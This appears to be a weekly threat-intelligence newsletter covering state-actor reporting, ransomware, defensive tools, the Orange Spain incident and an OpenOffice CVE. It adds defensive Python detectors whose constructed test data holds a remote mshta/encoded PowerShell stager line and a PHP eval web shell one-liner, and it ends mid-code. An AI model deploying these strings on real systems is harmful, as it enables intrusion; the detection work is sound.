CTO at NCSC Summary: week ending January 14th
The intangible costs from breaches aren't being estimated or calculated today.. we likely need to work on that..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week the thing to note is this blog from LastPass and the forced master password changes etc. to increase security. Outside of that, VPN zero-days being exploited (see below)..
In the high-level this week:
Journal of Cyber Policy - December 2023 including Interview with Will Middleton: The UK's approach to cyber security capacity building in a changing world
ECB to run first cyber resilience stress tests - The tests, conducted with 109 supervised banks, adopt a scenario in which a cyberattack succeeds in disrupting each bank’s daily business operations.
Office Of The Inspector General Of The Intelligence Community - Joint Report On The Implementation Of The Cybersecurity Information Sharing Act Of 2015 - December 2023 Report - The OIGs determined that CTI and DM sharing has improved over the past two years, and efforts are underway to expand accessibility to information.
National control and cyber resilience to safeguard national security - from Norway and published late December
An Analysis of Cybersecurity Education Programs in Europe: Key Findings - an initial assessment of cybersecurity educational programs in eight European countries: the Czech Republic, France, Germany, Greece, Poland, Romania, Spain, and Ukraine.
Cybersecurity and Privacy of Genomic Data - from NIST and published late December - Genomic cybersecurity guidance can aid organizations by 1) protecting them against data misuse which could harm individuals, companies, and nations and 2) enabling secure collaborative innovations.
New $20m project by British and Singapore researchers to improve healthcare cyber security - scientists from Imperial College London and Nanyang Technological University (NTU) will embark on a $20 million programme to improve the cyber security of medical devices.
FTC Order Prohibits Data Broker X-Mode Social and Outlogic from Selling Sensitive Location Data - Data broker X-Mode Social and its successor Outlogic will be prohibited from sharing or selling any sensitive location data to settle Federal Trade Commission allegations that the company sold precise location data that could be used to track people’s visits to sensitive locations such as medical and reproductive health clinics, places of religious worship and domestic abuse shelters.
Merck $1.4 Billion Cyberhack Settlement Ends ‘Warlike’ Act Claim - Three of Merck’s insurers filed stipulations with the justices Wednesday—just before the scheduled start of oral argument—notifying the court that argument was off in the insurers’ appeal of a state appellate court ruling that Merck was entitled to roughly $700 million in claims.
follow-up Insurance Journal reporting
Ofcom poaches Big Tech staff in push to enforce new internet curbs - The regulator has created a new team of nearly 350 people dedicated to tackling online safety, including new hires from senior jobs at Meta, Microsoft and Google.
A Study on Implementation Attacks against QKD Systems - excellent work from Germany’s BSI; they have also published other good quantum work in recent(ish) history:
Study: Development status of quantum computers version 2.0 (November 2023)
Market Survey on Cryptography and Quantum Computing (August 2023)
Defending Democracy
Deplatforming Norm-Violating Influencers on Social Media Reduces Overall Online Attention Toward Them - After 12 months, we estimate that online attention toward deplatformed influencers is reduced by -63% (95% CI [-75%,-46%]) on Google and by -43% (95% CI [-57%,-24%]) on Wikipedia.
Artificial Intelligence’s Threat to Democracy - by the team at CISA - Although the technology won’t introduce fundamentally new risks in the 2024 election—bad actors have used cyberthreats and disinformation for years to try to undermine the American electoral process—it will intensify existing risks.
World Economic Forum - The Global Risks Report 2024 - Beyond elections, perceptions of reality are likely to also become more polarized, infiltrating the public discourse on issues ranging from public health to social justice. However, as truth is undermined, the risk of domestic propaganda and censorship will also rise in turn. In response to mis- and disinformation, governments could be increasingly empowered to control information based on what they determine to be “true”
Reporting on/from China
China Orders Banks, Insurers to Review Cyber and Data Security - In a directive sent at the end of last year, The National Financial Regulatory Administration asked banks and insurers to fix any identified loopholes to guard against the risk of ransomware attacks by mid-January, according to people familiar with the matter. Banks were urged to reinforce the secure usage of emails and protect against phishing, said the people, asking not to be identified discussing a private matter.
Beijing forensic institute cracks AirDrop transmission, helping police trace senders of ‘inappropriate messages’ - crack is a strong word; reduction of the problem space through pre-computation of a hash table is more accurate.
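To make the point concrete, here is an added illustration of mine (not from the reporting above) of why hashing a low-entropy identifier such as a phone number does not hide it: precompute the digest of every candidate, then invert an observed digest by lookup. Everything specific here is an assumption for the demo: SHA-256 over an E.164-style string, a truncated digest, and a constructed four-digit number range. The real AirDrop field format is not described on this page and is not modelled.

```python
"""
Added illustration (my own): precomputed hash-table inversion of a
low-entropy identifier. Assumptions: SHA-256 over the identifier string,
a truncated digest, and a constructed number range.
"""
import hashlib
from typing import Dict, Optional

TRUNCATE_BYTES = 8  # assumed: a receiver compares only a short prefix of the digest


def digest(identifier: str) -> str:
    """Truncated hex digest of an identifier, as a receiver might observe it."""
    return hashlib.sha256(identifier.encode()).hexdigest()[: TRUNCATE_BYTES * 2]


def build_table(prefix: str, width: int) -> Dict[str, str]:
    """Precompute digest -> identifier for every number <prefix><width digits>.

    Cost is one hash per candidate. A national numbering plan is roughly
    10^9 to 10^10 candidates, which commodity hardware computes offline.
    """
    table: Dict[str, str] = {}
    for n in range(10 ** width):
        ident = f"{prefix}{n:0{width}d}"
        table[digest(ident)] = ident
    return table


def invert(table: Dict[str, str], observed: str) -> Optional[str]:
    """Reverse an observed digest by lookup; None if outside the precomputed space."""
    return table.get(observed)


def demo() -> Optional[str]:
    # Constructed: 10,000 candidates under one fixed prefix
    table = build_table("+4420700", 4)
    observed = digest("+44207001234")  # what a capture of the "sender" field would hold
    return invert(table, observed)


if __name__ == "__main__":
    print(demo())
```

The defence is not a better hash but a larger or salted input space (a per-session salt or a keyed exchange), otherwise the table is built once and reused against every capture.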
Hackers help Philippines’ understaffed cyberdefence team fight China threat - from the South China Morning Post - The government’s cyber response team has 35 members. The group is so understaffed that it is sometimes forced to work with anonymous “black hat” hackers, who may have previously attacked government websites but are willing to offer tips on looming threats, said Jeffrey Ian Dy, undersecretary at the Department of Information and Communications Technology.
A Deep Dive into Data Leakage and Commerce in Chinese Telegram - by the team at the company S2W in Taiwan - “A total of 620 damaged companies and institutions confirmed on Telegram in China during the second half of 2023. The country with the highest number of victims is Taiwan , and 7 out of the top 10 are Asian countries.”
Artificial intelligence
Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations - from NIST
FTC - AI Companies: Uphold Your Privacy and Confidentiality Commitments - There’s also a risk that a model-as-a-service company may, through its APIs, infer a range of business data from the companies using its models, such as their scale and precise growth trajectories.
List of Law Firms for Plaintiffs suing AI companies in copyright lawsuits
EU Commission launches calls for contributions on competition in virtual worlds and generative AI - looking into some of the agreements that have been concluded between large digital market players and generative AI developers and providers. The European Commission is investigating the impact of these partnerships on market dynamics
Cyber proliferation
Amazingly nothing of note this week
How Crime Shapes Insurance and Insurance Shapes Crime - Crime creates demand for insurance but supplying insurance may promote crime. We examine five case studies of insured crimes (auto theft, art theft, kidnap and hijack for ransom, ransomware, and payment card fraud) and find a co-evolutionary process through which insurers engage with insureds, governments, and legal and extralegal third parties to mitigate losses, particularly when criminal innovations destabilize the insurance market.
The reflection this week comes off the back of the book Capitalism Without Capital: The Rise of the Intangible Economy. If you take one thing from this book it is the value of data and other intangibles to companies/organisations in modern economies. Why this matters in the context of cyber is that, whilst there will be costs on the balance sheet for dealing with cyber intrusions, the loss of any edge/value an organisation had because of its intangibles won’t be recorded. We do not have the maturity in a lot of cases to quantify it either.. fun times trying to price that in (think Nortel)!
Finally, I found some time to do a few hours of technical research stemming from a hunch which resulted in a neat canary opportunity embedded in media files to detect breaches when opened by adversaries… fly my canaries.. fly..
Enjoying this? Don’t get via e-mail? Subscribe:
Think someone else would benefit? Share:
All attribution is by others and not the UK Government, please see the legal text at the end.
Have a lovely Thursday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Reporting on Russia
Russian hackers were inside Ukraine telecoms giant for months - cyber spy chief
A warning to all CNI companies on strategic placement here..
Russian hackers were inside Ukrainian telecoms giant Kyivstar's system from at least May last year in a cyberattack that should serve as a "big warning" to the West, Ukraine's cyber spy chief told Reuters.
Targeted attacks against Ukrainian servicemen using the topic of recruitment to the 3rd OSHBr and the IDF
From the Ukrainian government on alleged Russian activity; the tradecraft (LNK files via email) is rather basic, however.
It was found that no later than November 2023, unknown persons were distributing archives containing LNK files, the launch of which triggers the REMCOSRAT and REVERSESSH malware chain, creating the technical conditions for attackers to gain unauthorized remote access to computers.
As a rule, the mentioned shortcut files contain an obfuscated command to download and run, with the help of mshta.exe, an HTA file containing obfuscated program code. In turn, the VBScript code runs a PowerShell command designed for decryption (AES-128-ECB),
https://cert.gov.ua/article/6276988
https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method
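The chain above (LNK -> mshta.exe fetching an HTA -> PowerShell) is noisy in process telemetry. As an added detection sketch of mine (not CERT-UA's or Uptycs' code), the following scores process-creation events for exactly that parent/child shape. The events are constructed, not real telemetry; the field names mirror the usual Sysmon Event ID 1 fields (Image, ParentImage, CommandLine) and the scoring weights are my own choice.

```python
"""
Added detection sketch (my own): score process-creation events for the
LNK -> mshta.exe -> remote HTA -> PowerShell stager chain.
Sample events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# HTA fetched from a URL or a UNC share rather than a local file
REMOTE_SRC = re.compile(r"https?://|\\\\[a-z0-9.-]+\\", re.I)
# Hidden window, no profile, or an encoded command
PS_SUSPICIOUS = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|(?:^|\s)-nop\b",
    re.I,
)


def find_chains(events: List[ProcEvent]) -> List[Dict]:
    """Return one finding per mshta.exe process that looks like the stager."""
    findings = []
    for e in events:
        if basename(e.image) != "mshta.exe":
            continue
        score, reasons = 0, []
        if REMOTE_SRC.search(e.cmdline):
            score += 2
            reasons.append("mshta loads remote HTA")
        for child in (c for c in events if c.ppid == e.pid):
            if basename(child.image) in ("powershell.exe", "pwsh.exe"):
                score += 1
                reasons.append("mshta spawns PowerShell")
                if PS_SUSPICIOUS.search(child.cmdline):
                    score += 2
                    reasons.append("hidden/encoded PowerShell")
        if score >= 3:  # assumed alerting threshold
            findings.append({"pid": e.pid, "score": score, "reasons": reasons})
    return findings


# Constructed sample: explorer runs the LNK's mshta command, which stages PowerShell
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(512, 400, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.10/update.hta"),
    ProcEvent(530, 512, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    # Benign: a local HTA admin tool with no children
    ProcEvent(600, 400, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Tools\inventory.hta"),
    ProcEvent(700, 400, r"C:\Program Files\App\app.exe", "app.exe"),
]

if __name__ == "__main__":
    for finding in find_chains(SAMPLE_EVENTS):
        print(finding)
```

The local-HTA case is deliberately left unflagged: mshta.exe on its own is common in some estates, so the signal is the remote source plus the PowerShell child, not the binary.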
Reporting on China
Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
See the exploitation section below for details - attributed by the reporting vendor (Volexity) to an alleged Chinese state actor.
Detailed Analysis of ‘Operation Japan’ Campaign
Reporting out of Taiwan on a multifaceted campaign which allegedly involved Chinese hacktivists, who I think it is fair to say haven’t been as prominent as they once were around the turn of the century. Of note is the fact they are exploiting web vulnerabilities in this case..
Chinese hacktivist groups are strongly opposing Japan's nuclear waste discharge, and hacktivists from Italy (Anonymous Italia Team) and Indonesia (VulzSec), which are not directly related to the discharge of contaminated water from the Fukushima nuclear power plant, are also opposing Japan's nuclear waste discharge. They strongly oppose it and are carrying out cyber attacks by launching ‘OpFukushima’ and ‘OpJapan’ campaigns, respectively.
CVE-2022-29303: command injection vulnerability, exploited by inserting a command into the email address input box on the test email sending page.
CVE-2023-23333: SolarView Compact ver. 6.00 and lower command injection vulnerability, exploited by inserting a command into the file parameter passed to downloader.php.
https://medium.com/s2wblog/detailed-analysis-of-operation-japan-campaign-14834a14a684
Reporting on North Korea
North Korean Hacking Group Lazarus Withdraws $1.2M of Bitcoin From Coin Mixer
Money on the move..
Lazarus Group, said to have been behind some $3 billion worth of cryptocurrency hacks and exploits over the past three years, appears to be moving around some of its bitcoin hoard. The group holds $79 million in wallets tagged by the blockchain analysis firm Arkham.
North Korean hackers Lazarus Group have moved $1.2 million worth of their ill-gotten gains from a coin mixer to a holding wallet, marking their largest transaction in over a month.
Data from the blockchain analysis firm Arkham shows that Lazarus Group's wallet received 27.371 bitcoin (BTC) in two transactions before sending out 3.34 BTC to a previously used wallet. The coin mixer wasn't identified.
Current status of spearphishing email attacks by North Korean hacking organizations
Reporting out of South Korea on alleged North Korean activity which gives a sense of scale of the phishing ops from one of the sub groups. Of note is the hit rate against the victims.
Over the past 10 months, 16 email servers and 24 impersonation accounts were used for spear phishing, sending messages to hundreds of key figures at home and abroad.
One in four recipients of spear phishing emails reads them without suspicion and then sends a reply email, making it highly likely that they will be infected with malware.
[The attacker] responds precisely, completely and naturally, tailored to the target's details and the content of their reply, and then distributes malware.
Analyzing DPRK's SpectralBlur
Patrick Wardle’s analysis hints that this alleged DPRK macOS implant was potentially ported from another Unix OS such as Linux due to the POSIX API reliance.
https://objective-see.org/blog/blog_0x78.html
Reporting on Iran
“Homeland Justice” targets Albanian organizations with “No-justice” wiper
Detailed technical analysis on an alleged Iranian destructive operation in Albania which was covered last week. Of note is that the first campaign was apparently over 18 months prior to the eventual outcome..
Homeland Justice launched its first campaign on July 15th, 2022, targeting Albanian e-government systems right before a planned conference of Iranian opposition group Mojahedin-e Khalq (Persian: مجاهدین خلق), also known as MEK - a well-known Iranian group seeking to replace the current regime in Iran. The conference was cancelled following the attack. In September 2022, the actor launched a second campaign targeting Albanian border crossings. On December 24th, 2023, the actor publicized the current campaign, described in this blog, targeting Albanian infrastructure and government organizations. It is interesting to note that an MEK camp was raided by police in June 2023.
https://www.clearskysec.com/no-justice-wiper/
Reporting on Other Actors
Turkish espionage campaigns in the Netherlands
Alleged Turkish activity reporting from a team that have first-hand experience of this actor from a former life.
In the past year, [we have] observed cyberattacks in the Netherlands, which are believed to have been orchestrated by a cyber threat actor operating in alignment with Turkish interests, signalling an escalation in Turkey's pursuit of objectives within Western nations.
Motivation: primarily focused on acquiring economic and political intelligence through espionage and information theft that targets public and private entities;
Targeted Sectors: Government entities, Kurdish (political) groups like PKK, telecommunication, ISPs, IT-service providers (including security companies), NGO and Media & Entertainment sectors;
Geographical Focus: focuses primarily on targeting organizations in Europe, Middle East and North Africa;
https://www.huntandhackett.com/blog/turkish-espionage-campaigns
A gamer turned malware developer: diving into Silver RAT and its Syrian roots
Nothing overly notable here other than the region and the capability breeding within it. The path travelled by this individual is all too familiar; I remember hiring a young person once who was studying accountancy (hated it) and was fiddling with games and a memory hex editor at home. He became a wonderful penetration tester.. this is the light side of the path, below is the dark side..
During our investigation, we discovered a Facebook account of a hacktivist group that supports the “Syrian Revolution”, with post engagement from a developer of Silver RAT based on multiple attribute matches. Reviewing the developer’s previous posts reveals a history of offering various first-person shooter (FPS) game hacks and mods.
The developer, operating under the name “Anonymous Arabic,” appears to be supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware. It is crucial for organizations to enhance their defense mechanisms in response to this potential threat.
Follow-On Extortion Campaign Targeting Victims of Akira and Royal Ransomware
Stefan Hostetler and Steven Campbell detail some interesting cases of double dipping against victims. Getting to the bottom of the what/why here is important..
[We] investigated several cases of Royal and Akira ransomware victims being targeted in follow-on extortion attacks starting in October 2023.
It is not clear whether these follow-on extortion attempts were officially sanctioned by the groups responsible for the original ransomware attacks, given the low payment demands, in addition to other unique campaign elements.
Based on our analysis of common elements between these cases, Arctic Wolf Labs assesses with moderate confidence that a common threat actor was responsible for these follow-on extortion attempts.
Mirai.TBOT Uncovered: Over 100 Groups and 30,000+ Infected Hosts in a big IoT Botnet
Wang Hao, Acey9 and Alex.Turing report from China on the scale and capability of this rather large IoT botnet. That is some DDoS capacity..
Multiple Bot groups (100+), representing a higher number of infection methods
Ability to exploit 0-days
OpenNIC custom C2 domains (32 domains in some samples, not all registered)
Massive scale (we registered 3 of the C2 domains mentioned above on November 4, 2023, so we can obtain an approximate count of its bots, which is active with more than 30,000 Bot IPs per day)
Mainly used for DDoS purposes
https://blog.xlab.qianxin.com/mirai-tbot-en/
In-depth analysis and technical analysis of LockBit, the top encryption ransomware organization
Detailed analysis out of China on this criminal group giving a sense of their operational modus operandi and end-to-end sophistication.
LockBit operators and affiliates will find ways to obtain initial access to the victim and use it to deliver the encrypting ransomware. The attack methods can be roughly divided into the following:
Extensive vulnerability scanning. Using N-day, 1-day and 0-day vulnerabilities to scan assets in batches, often referred to as casting a wide net.
Insiders in the company. By bribing corporate insiders, LockBit has paid millions of dollars to insiders who provided important access, who clicked on the extortion emails, or who manually ran the malware.
New 1-day vulnerabilities. Such as the Fortinet firewall vulnerability CVE-2018-13379, Citrix NetScaler network device vulnerabilities, the VMware Log4j2 vulnerability, F5 code execution vulnerabilities, etc.
Account passwords sold on the dark web. Including VPN, RDP and corporate email accounts and passwords.
Access bought from initial access brokers (IABs). The LockBit organisation purchases the corresponding access from IABs.
RDP credentials. Obtained through underground purchase or RDP brute force.
VPN exploitation. Through VPN vulnerabilities or weak VPN passwords.
Social engineering phishing. Backdoors bundled in email attachments, as well as Office macro backdoors.
Discovery
How we find and understand the latent compromises within our environments.
Ghost in the Web Shell: Introducing ShellSweep
Michael Haag provides a capability which means there should be little excuse for the presence of latent web shells now, whilst also bringing some applied data science to the party.
[We] developed a suite of utilities designed to help organizations detect, catalog, and combat malicious web shells. Today, we're thrilled to introduce you to ShellSweep, a powerful tool designed to hunt down and flag potential web shells lurking in your web servers, which encompasses three utilities: ShellScan, ShellCSV and ShellSweep.
These utilities work in tandem to identify potential web shells and help you provide a comprehensive defense against web shells in your environments.
https://www.splunk.com/en_us/blog/security/ghost-in-the-web-shell-introducing-shellsweep.html
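For those who want to see what the "applied data science" side of a web shell hunt looks like in practice, here is an added example of mine (not ShellSweep's code) combining the two cheap signals such tools usually lean on: byte entropy (packed or base64-stuffed scripts sit near 6 bits/byte, hand-written source nearer 4.5) and a small list of dangerous constructs. The webroot it scans is constructed in a temp directory, and the threshold and regex are my assumptions rather than ShellSweep's.

```python
"""
Added example (my own, not ShellSweep's): entropy plus dangerous-construct
scoring over a constructed webroot. Threshold and regex are assumptions.
"""
import base64
import math
import os
import random
import re
import tempfile
from typing import List, Tuple

SUSPECT_EXT = {".php", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}
ENTROPY_THRESHOLD = 5.8  # assumed; base64/packed blobs sit near 6.0, prose near 4.5
DANGEROUS = re.compile(
    rb"eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(|assert\s*\(|"
    rb"Request\.Item\[|Runtime\.getRuntime\(\)\.exec",
    re.I,
)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def score_file(data: bytes) -> Tuple[float, List[str]]:
    ent = shannon_entropy(data)
    reasons = []
    if ent >= ENTROPY_THRESHOLD:
        reasons.append(f"high entropy {ent:.2f}")
    m = DANGEROUS.search(data)
    if m:
        reasons.append("dangerous construct: " + m.group(0).decode(errors="replace"))
    return ent, reasons


def scan(root: str) -> List[Tuple[str, float, List[str]]]:
    """Walk a webroot and report script files with at least one signal."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SUSPECT_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                ent, reasons = score_file(fh.read())
            if reasons:
                findings.append((os.path.relpath(path, root), round(ent, 2), reasons))
    return sorted(findings)


def build_sample_webroot(root: str) -> None:
    """Constructed files: a benign page, an obfuscated one-liner, a packed blob, a non-script."""
    rnd = random.Random(7)  # deterministic "packed" payload
    blob = base64.b64encode(bytes(rnd.getrandbits(8) for _ in range(3000))).decode()
    files = {
        "index.php": '<?php echo "<h1>Welcome</h1>"; include "footer.php"; ?>\n',
        "uploads/img.php": "<?php eval(base64_decode($_POST['k'])); ?>\n",
        "cache/s.php": f'<?php $p="{blob}"; ?>\n',
        "notes.txt": "eval( this is not a script file and is ignored\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)


def demo_scan() -> List[Tuple[str, float, List[str]]]:
    """Build the sample webroot in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_webroot(d)
        return scan(d)


if __name__ == "__main__":
    for hit in demo_scan():
        print(hit)
```

Note the two samples that fire are caught by different signals: the one-liner has low entropy but a dangerous construct, the packed blob has no construct but high entropy, which is why a real hunt layers both rather than relying on either.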
BPF Memory Forensics with Volatility 3
Great work here which will be super valuable when upstreamed into the main Volatility project.
While the workshop, our plugins, and this post are an important step towards this goal, much work remains to be done. First, in order for the present work to be useful in the real world our next goal must be to upstream most of it into the Volatility 3 project. Only this will ensure that investigators all around the world will be able to easily find and use it. This will require:
Refactoring of our utility code to use Volatility 3’s extension class mechanism
The bpf_graph plugin relies on networkx, which is not yet a dependency of Volatility 3. If the introduction of a new dependency into the upstream project is not feasible, one could make it optional by checking for the presence of the package within the plugin.
Additional testing on older kernel versions and kernels with diverse configurations to meet Volatility’s high standards regarding compatibility
We will be happy to work with upstream developers to make the integration happen.
https://lolcads.github.io/posts/2023/12/bpf_memory_forensics_with_volatility3/
Defence
How we proactively defend our environments.
Generation of Tailored and Confined Datasets for IDS Evaluation in Cyber-Physical Systems
Thomas Hutzelmann, Dominik Mauksch, Ana Petrovska, and Alexander Pretschner bring some rigour to data set generation for cyber detection in cyber-physical systems. This helps on the path to cyber as a science..
The state-of-the-art evaluation of an Intrusion Detection System (IDS) relies on benchmark datasets composed of the regular system’s and potential attackers’ behavior. The datasets are collected once and independently of the IDS under analysis.
This paper questions this practice by introducing a methodology to elicit particularly challenging samples to benchmark a given IDS. In detail, we propose (1) six fitness functions quantifying the suitability of individual samples, particularly tailored for safety-critical cyber-physical systems, (2) a scenario-based methodology for attacks on networks to systematically deduce optimal samples in addition to previous datasets, and (3) a respective extension of the standard IDS evaluation methodology.
We applied our methodology to two network-based IDSs defending an advanced driver assistance system. Our results indicate that different IDSs show strongly differing characteristics in their edge case classifications and that the original datasets used for evaluation do not include such challenging behavior. In the worst case, this causes a critical undetected attack, as we document for one IDS. Our findings highlight the need to tailor benchmark datasets to the individual IDS in a final evaluation step. Especially the manual investigation of selected samples from edge case classifications by domain experts is vital for assessing the IDSs.
https://mediatum.ub.tum.de/1730888
Latest Windows hardening guidance and key dates
Namrata Bachwani outlines the plan for this year..
EDRNoiseMaker
Arturo gives the world a tool to help detect the misuse of WFP covered previously. I like the fact that this happened in response to offensive tradecraft.. your move, OST producers :).
The aim of this tool is to detect potential silencers of an EDR (or the process you choose). Based on the attack against EDR developed by EDRSilencer and FireBlock, EDRNoiseMaker tries to detect them by checking a list of executables that have been silenced using the Windows Filtering Platform (WFP).
https://github.com/amjcyber/EDRNoiseMaker
Hunting M365 Invaders: Blue Team's Guide to Initial Access Vectors
Mauricio Velazco gives a vendor specific set of tradecraft which can likely be applied in other analytical environments.
We then introduce six common techniques typically used during initial access against M365 tenants, explaining how to simulate them and how teams can detect them.
Choosing a security model - AWS Prescriptive Guidance
Wisdom from the AWS cyber security deities..
You can choose from various security models or approaches for AWS. The choice of approach and the best-fitting model depends on your audience, the target business outcomes, and the overall business process. It is possible to use a blend of multiple models.
The following are a few common models:
Architectural model
Maturity model
Governance model
Each model has its own set of benefits and drawbacks. It is important to consider which approach is best suited for your organization. Involve security professionals early in the process of modernizing your infrastructure and adopting cloud strategies. The model you choose has a significant impact on the roles and responsibilities within your organization.
Incident Writeups
How they got in and what they did.
How 50% of telco Orange Spain’s traffic got hijacked^H^H^H^H^H^Hnull routed — a weak password
Kevin Beaumont details this very unfortunate event, which highlights a likely unexpected soft underbelly / concentration risk.
The threat actor accessed Orange’s RIPE account. RIPE look after internet IP addresses, basically the phone book of the internet. From their RIPE details, they were able to announce config which broke BGP routing — think the routing between networks which tell the network where to route the calls.
To administer RIPE, you use a website called access.ripe.net. The threat actor posted themselves logged in to account adminripe-ipnt@orange.es:
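The closing comment on this page points at RPKI route origin validation (ROV) as the bigger issue in this incident. To show the mechanics of that control, here is an added example of mine (not from Beaumont's or Madory's write-ups) implementing the RFC 6811 validity check over constructed ROAs: a route with no covering ROA is merely "not-found" and accepted, a ROA created for the wrong origin ASN turns the legitimate announcement "invalid" so ROV-enforcing peers drop it, and a correct ROA makes it valid again. Prefixes and ASNs are documentation ranges, not Orange's real resources.

```python
"""
Added example (my own): RFC 6811 route origin validation over constructed
ROAs. Documentation prefixes/ASNs only; not Orange's real resources.
"""
from dataclasses import dataclass
from ipaddress import ip_network
from typing import Iterable, List


@dataclass(frozen=True)
class ROA:
    prefix: str      # e.g. "192.0.2.0/24"
    max_length: int  # longest prefix the ASN may originate under this ROA
    asn: int         # 0 means "nobody may originate this" (AS0 ROA)


def covers(roa: ROA, announced) -> bool:
    """A ROA covers a route if the announced prefix lies within the ROA prefix."""
    r = ip_network(roa.prefix)
    return r.version == announced.version and announced.subnet_of(r)


def validate(prefix: str, origin_asn: int, roas: Iterable[ROA]) -> str:
    """Return 'valid', 'invalid' or 'not-found' per RFC 6811 section 2."""
    announced = ip_network(prefix)
    covering = [r for r in roas if covers(r, announced)]
    if not covering:
        return "not-found"
    for r in covering:
        if r.asn == origin_asn and announced.prefixlen <= r.max_length:
            return "valid"
    return "invalid"


def policy(state: str) -> str:
    """Typical ROV-enforcing policy: drop invalids, accept the rest."""
    return "drop" if state == "invalid" else "accept"


def demo() -> List[str]:
    legit_asn, attacker_asn = 64496, 64511
    route = "198.51.100.0/24"
    # Before: no ROA exists, so the legitimate route is not-found and accepted.
    before = validate(route, legit_asn, [])
    # After: a ROA is created for the wrong ASN via the hijacked registry
    # account; the legitimate announcement is now invalid and gets dropped.
    bogus = ROA("198.51.100.0/22", 24, attacker_asn)
    after = validate(route, legit_asn, [bogus])
    # Fix: a correct ROA for the real origin makes the route valid again.
    fixed = validate(route, legit_asn, [bogus, ROA("198.51.100.0/22", 24, legit_asn)])
    return [f"{s}->{policy(s)}" for s in (before, after, fixed)]


if __name__ == "__main__":
    print(demo())
```

The asymmetry is the point: whoever controls the registry account controls the ROAs, and a single bad ROA is enough to have every ROV-enforcing network drop your legitimate routes.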
Vulnerability
Our attack surface.
CVE-2023-47804: OpenOffice Macro URL arbitrary script execution
Two things here: first, the original patch was not comprehensive; second, the potential for exploitation via documents arriving by email.
Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of Apache OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502.
https://www.openoffice.org/security/cves/CVE-2023-47804.html
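A triage check for the mailbox side of this, as an added example of mine (not from the advisory): unzip an ODF document and scan its XML parts for links whose URI scheme invokes a macro, flagging those bound to automatic document events since they fire without a click. The scheme names vnd.sun.star.script: and macro:, the ODF namespaces and the event-listener structure are my assumptions about how such links appear; the document is constructed in memory.

```python
"""
Added example (my own): scan an ODF package for macro-invoking links and
flag those attached to automatic document events. Scheme names and event
structure are assumptions; the sample document is constructed.
"""
import io
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List
from urllib.parse import urlsplit

MACRO_SCHEMES = {"vnd.sun.star.script", "macro"}  # assumed macro-invoking schemes
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
SCRIPT_NS = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
EVENT_LISTENER = f"{{{SCRIPT_NS}}}event-listener"
EVENT_NAME = f"{{{SCRIPT_NS}}}event-name"
XML_PARTS = ("content.xml", "styles.xml")


def find_macro_links(odf_bytes: bytes) -> List[Dict]:
    """Return every xlink:href using a macro scheme, noting event-bound ones."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(odf_bytes)) as zf:
        for part in XML_PARTS:
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for el in root.iter():
                href = el.get(XLINK_HREF)
                if not href:
                    continue
                if urlsplit(href).scheme.lower() in MACRO_SCHEMES:
                    findings.append({
                        "part": part,
                        "href": href,
                        "automatic": el.tag == EVENT_LISTENER,  # fires without a click
                        "event": el.get(EVENT_NAME),
                    })
    return findings


def build_sample_odt(with_macros: bool = True) -> bytes:
    """Constructed minimal ODT: one benign link, one macro link, one load-event macro."""
    scripts = (
        '<office:scripts><office:event-listeners>'
        '<script:event-listener script:event-name="dom:load" '
        'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>'
        '</office:event-listeners></office:scripts>'
    ) if with_macros else ""
    macro_link = (
        '<text:p><text:a xlink:href="macro://./Standard.Module1.Main">click me</text:a></text:p>'
    ) if with_macros else ""
    content = (
        '<office:document-content '
        'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
        f'xmlns:script="{SCRIPT_NS}" xmlns:xlink="http://www.w3.org/1999/xlink">'
        f'{scripts}<office:body><office:text>'
        '<text:p><text:a xlink:href="https://example.com/">benign link</text:a></text:p>'
        f'{macro_link}</office:text></office:body></office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content)
    return buf.getvalue()


if __name__ == "__main__":
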